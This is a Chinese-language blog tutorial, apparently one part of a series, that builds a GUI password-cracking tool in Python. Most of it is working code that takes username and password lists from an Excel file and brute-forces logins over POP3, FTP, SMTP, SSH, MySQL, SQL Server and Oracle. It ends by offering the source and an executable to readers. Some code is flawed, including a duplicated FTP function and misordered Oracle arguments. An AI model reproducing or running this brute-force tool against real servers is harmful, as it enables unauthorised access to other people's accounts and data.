以前咱們完成了密碼破解工具的界面,今天咱們來看看功能實現吧。
mysql
目錄
首先咱們先完成「提交」功能的實現,「提交」按鈕的做用是將用戶填寫的服務器地址、服務器端口和協議類型信息存儲起來,用於後面的密碼驗證。因此咱們先定義了一個字典(由於oracle的數據庫鏈接必需要實例名,因此咱們新增了一個db_name)。sql
1 dic_list = {'server_ip':'','server_port':'','pro':'','db_name':""}
獲取服務器地址和端口咱們定義了一個回調函數gettext,將兩個Entry對象傳遞過來後,直接使用一個get命令就能夠將Entry中的內容取出來,同時咱們添加了對IP和端口的合法性校驗。數據庫
1 def gettext(x,y): 2 """ 3 獲取輸入框內容 4 :param x: 輸入框對象——服務器IP 5 :param y: 輸入框對象——服務器端口 6 :return: 7 """ 8 server_ip = x.get() 9 server_port = y.get() 10 #判斷輸入的IP和端口是否合法 11 if (not re.match("[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\.[a-zA-Z0-9][-a-zA-Z0-9]{0,62})+\.?",server_ip)): 12 tkinter.messagebox._show(title="IP輸入不合法", message='請從新輸入合法IP') 13 # elif not(re.match("^?:([1-6][0-9]{1,4})|([1-9][0-9]{0,3})$",server_port)): 14 elif not(re.match("^[1-9]$|(^[1-9][0-9]$)|(^[1-9][0-9][0-9]$)|(^[1-9][0-9][0-9][0-9]$)|(^[1-6][0-5][0-5][0-3][0-5]$)$",server_port)): 15 tkinter.messagebox._show(title="端口輸入不合法", message='請從新輸入合法端口') 16 else: 17 dic_list["server_port"] = server_port 18 dic_list["server_ip"] = server_ip 19 print(dic_list["server_ip"],dic_list["server_port"])
對於協議類型的讀取,咱們定義了一個回調函數get_select,同時咱們對協議是否選擇進行判斷,若沒有選擇則提示從新選擇協議。服務器
1 def get_select(y,list_pro): 2 """ 3 獲取列表的選擇 4 :param y:列表框對象 5 :param list_pro:列表 6 """ 7 for i in range(0, len(list_pro)): 8 if y.selection_includes(i): 9 #補充dic_list字典中的協議字段內容 10 dic_list["pro"] = list_pro[i] 11 else: 12 pass 13 if dic_list["pro"]=="": 14 tkinter.messagebox._show(title="協議未選擇", message='請從新破解協議') 15 elif dic_list["pro"]=='Oracle': 16 dic_list['db_name']=getInput("Oracle實例","請輸入Oracle實例信息") 17 print(dic_list['db_name'])
同時咱們添加了一個對oracle協議的判斷,若選擇oracle協議則須要彈出一個窗口填寫數據庫實例名稱。咱們新增了一個彈框輸入的函數get_Input進行調用。oracle
1 def getInput(title, message): 2 def return_callback(event): 3 print('quit...') 4 root.quit() 5 6 def close_callback(): 7 tkinter.messagebox.showinfo('message', 'no click...') 8 9 root = tkinter.Tk(className=title) 10 root.wm_attributes('-topmost', 1) 11 screenwidth, screenheight = root.maxsize() 12 width = 300 13 height = 100 14 size = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2) 15 root.geometry(size) 16 root.resizable(0, 0) 17 lable = tkinter.Label(root, height=2) 18 lable['text'] = message 19 lable.pack() 20 entry = tkinter.Entry(root) 21 entry.bind('<Return>', return_callback) 22 entry.pack() 23 entry.focus_set() 24 root.protocol("WM_DELETE_WINDOW", close_callback) 25 root.mainloop() 26 str = entry.get() 27 root.destroy() 28 return str
這樣咱們的「提交」按鈕功能就所有完成了。接下來咱們看看「開始破解」菜單按鈕的功能。app
咱們定義了一個回調函數爲mimapojiessh
-
首先會讀取密碼字典函數
-
而後是選擇協議並執行破解動做工具
-
最後是展現破解結果oop
1 def mimapojie(server_ip,server_port,pro): 2 get_user_and_passwd('./test.xls', 0) 3 print_list = choice_protocol(server_ip, int(server_port), pro,dic_list['db_name']) 4 #展現破解結果 5 tkinter.messagebox._show(title='破解結果',message=dic_list['pro'],detail=print_list)
接下來咱們依次看看這三個方面都是如何實現的。
咱們使用的是咱們以前文章中使用的讀取Excel表格的方式,咱們直接將第一列的內容讀取到user_list列表中,將第二列內容讀取到password_list列表中。
1 def get_user_and_passwd(file_path, sheet_id): 2 """ 3 獲取密碼庫中的用戶名密碼 4 :param file_path: 密碼庫的路徑及文件名 5 :param sheet_id: 密碼庫中的sheet id 6 """ 7 read_excel = ReadAndWriteExcel.OpenExcel(file_name=file_path, sheet_id=sheet_id) 8 rows = read_excel.get_lines() 9 global user_list 10 global password_list 11 for i in range(0, rows): 12 if read_excel.get_value(i, 0): 13 user_list.append(read_excel.get_value(i, 0)) 14 if read_excel.get_value(i, 1): 15 password_list.append(read_excel.get_value(i, 1))
咱們定義了一個選擇協議函數,根據獲取到的選擇協議字段執行不一樣的破解函數。
1 def choice_protocol(server_ip,server_port, pro,db_name): 2 """ 3 選擇須要破解的協議 4 :param server_ip:須要破解的服務器IP 5 :param server_port:須要破解的服務器端口 6 :param pro: 須要破解的協議 7 :param db_name: oracle數據庫的實例名 8 """ 9 if pro == "POP3": 10 attempt_pop(server_ip, server_port) 11 elif pro == "IMAP": 12 print('this is a test') 13 attempt_imap(server_ip, server_port) 14 elif pro == "SMTP": 15 attempt_smtp(server_ip, server_port) 16 elif pro == "FTP": 17 attempt_ftp(server_ip, server_port) 18 elif pro == "SSH": 19 attempt_ssh(server_ip, server_port) 20 elif pro == 'MySql': 21 attempt_mysql(server_ip, server_port) 22 elif pro == "SQL Server": 23 attempt_mssql(server_ip, server_port) 24 elif pro == "Oracle": 25 attempt_oracle(server_ip, server_port,db_name) 26 27 return print_list
1 def attempt_pop(server_ip, server_port): 2 """ 3 破解POP3協議的用戶名密碼 4 :param server_ip: 破解的服務器IP 5 :param server_port: 破解的服務器端口 6 """ 7 print("=======破解POP3協議========") 8 print_list.clear() 9 for i in range(0, len(user_list)): 10 for j in range(0, len(password_list)): 11 try: 12 pop3_server = poplib.POP3(host=server_ip,port=server_port) 13 pop3_server.user(user_list[i]) 14 pop3_server.pass_(password_list[j]) 15 #獲取郵件列表,用於判斷是否登陸成功 16 pop3_server.list() 17 print_list.append("用戶名:%s,密碼:%s登陸成功\n" % (user_list[i], password_list[j])) 18 except: 19 pass 20 if not print_list: 21 print_list.append("密碼破解失敗")
1 def attempt_ftp(server_ip,port=21): 2 """ 3 破解FTP協議的用戶名密碼 4 :param server_ip: 破解的服務器IP 5 :param port: 破解的服務器端口,默認爲21 6 """ 7 ftp = FTP() 8 ftp.connect(server_ip, port) 9 global print_list 10 print_list.clear() 11 for i in range(0, len(user_list)): 12 for j in range(0, len(password_list)): 13 try: 14 ftp.login(user_list[i], password_list[j]) 15 ftp.quit() 16 print_list.append("用戶名:%s,密碼:%s登陸成功\n" % (user_list[i], password_list[j])) 17 except: 18 pass 19 if not print_list: 20 print_list.append("密碼破解失敗")
1 def attempt_smtp(mail_host, port=25): 2 """ 3 破解SMTP協議的用戶名密碼 4 :param mail_host: 破解的服務器IP 5 :param show_flag: 標誌位,True表明展現破解失敗的用戶名密碼,False表明僅展現破解成功的用戶名密碼 6 :param port: 破解服務器的端口,默認爲25 7 """ 8 print("=======破解SMTP協議========") 9 10 global user_list 11 global password_list 12 print_list.clear() 13 for i in range(0, len(user_list)): 14 for j in range(0, len(password_list)): 15 try: 16 smtpObj = smtplib.SMTP(timeout=3) 17 smtpObj.set_debuglevel(0) 18 smtpObj.connect(mail_host, port) # 25 爲 SMTP 端口號 19 smtpObj.login(user_list[i], password_list[j]) 20 print_list.append("用戶名:%s,密碼:%s登陸成功\n" % (user_list[i], password_list[j])) 21 except Exception as e: 22 print(e) 23 pass 24 if not print_list: 25 print_list.append("密碼破解失敗")
1 def attempt_ftp(server_ip,port=21): 2 """ 3 破解FTP協議的用戶名密碼 4 :param server_ip: 破解的服務器IP 5 :param port: 破解的服務器端口,默認爲21 6 """ 7 ftp = FTP() 8 ftp.connect(server_ip, port) 9 global print_list 10 print_list.clear() 11 for i in range(0, len(user_list)): 12 for j in range(0, len(password_list)): 13 try: 14 ftp.login(user_list[i], password_list[j]) 15 ftp.quit() 16 print_list.append("用戶名:%s,密碼:%s登陸成功\n" % (user_list[i], password_list[j])) 17 except: 18 pass 19 if not print_list: 20 print_list.append("密碼破解失敗")
def attempt_ssh(server_ip, port=22): """ 破解SSH協議的用戶名密碼 :param server_ip: 破解的服務器IP :param port: 破解的服務器端口,默認爲22 """ print("=======破解SSH協議========") ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) global user_list global password_list print_list.clear() for i in range(0, len(user_list)): for j in range(0, len(password_list)): try: ssh.connect(hostname=server_ip, port=port, username=user_list[i], password=password_list[j]) print_list.append("用戶名:%s,密碼:%s登陸成功\n" % (user_list[i], password_list[j])) except: pass if not print_list: print_list.append("密碼破解失敗")
def attempt_mysql(server_ip, server_port=3306,db_name='mysql'): """ 破解MySQL協議的用戶名密碼 :param server_ip: 破解的服務器IP :param show_flag: 標誌位,True表明展現破解失敗的用戶名密碼,False表明僅展現破解成功的用戶名密碼 """ print("=======破解MYSQL協議========") global user_list global password_list print_list.clear() for i in range(0, len(user_list)): for j in range(0, len(password_list)): try: # pymysql.connect(host=server_ip,port=server_port,user=user_list[i],passwd=password_list[j],db=db_name) db = pymysql.connect(server_ip, user_list[i], password_list[j]) db.close() print_list.append("用戶名:%s,密碼:%s登陸成功\n" % (user_list[i], password_list[j])) except: pass if not print_list: print_list.append("密碼破解失敗")
def attempt_mssql(server_ip, server_port): """ 破解SQL server協議的用戶名密碼 :param server_ip: 破解的服務器IP :param server_port: 破解的服務器端口 """ print("=======破解SQL Server協議========") global user_list global password_list print_list.clear() for i in range(0, len(user_list)): for j in range(0, len(password_list)): try: db = pymssql.connect(server_ip,user_list[i],password_list[j]) db.close() # print("用戶名:%s,密碼:%s登陸成功" % (user_list[i], password_list[j])) print_list.append("用戶名:%s,密碼:%s登陸成功\n" % (user_list[i], password_list[j])) except: pass if not print_list: print_list.append("密碼破解失敗")
def attempt_oracle(server_ip,db_name, port=1521 ): """ 破解Oracle協議的用戶名密碼 :param server_ip: 破解的服務器IP :param show_flag: 標誌位,True表明展現破解失敗的用戶名密碼,False表明僅展現破解成功的用戶名密碼 :param port: 破解的服務器端口,默認爲1521 """ print("=======破解Oracle協議========") global user_list global password_list print_list.clear() for i in range(0, len(user_list)): for j in range(0, len(password_list)): try: cx_Oracle.connect(user_list[i]+'/'+password_list[j]+'@'+server_ip+':'+str(port)+'/'+db_name) # print("用戶名:%s,密碼:%s登陸成功" % (user_list[i], password_list[j])) print_list.append("用戶名:%s,密碼:%s登陸成功\n" % (user_list[i], password_list[j])) except Exception as e: pass if not print_list: print_list.append("密碼破解失敗")
這樣咱們的軟件就實現了,咱們看一下ftp協議和Oracle協議的破解效果吧。
頁面填寫
破解結果
破解界面配置同ftp界面,點擊「提交」後會彈出輸入實例名的窗口,輸入實例名並回車便可。
由於菜鳥小白沒有搭建Oracle服務器因此破解失敗的結果以下:
老規矩,關注公衆號「菜鳥小白的學習分享」。
- 回覆「密碼破解源碼」便可得到源碼下載連接
- 回覆「密碼破解可執行程序」便可得到工具軟件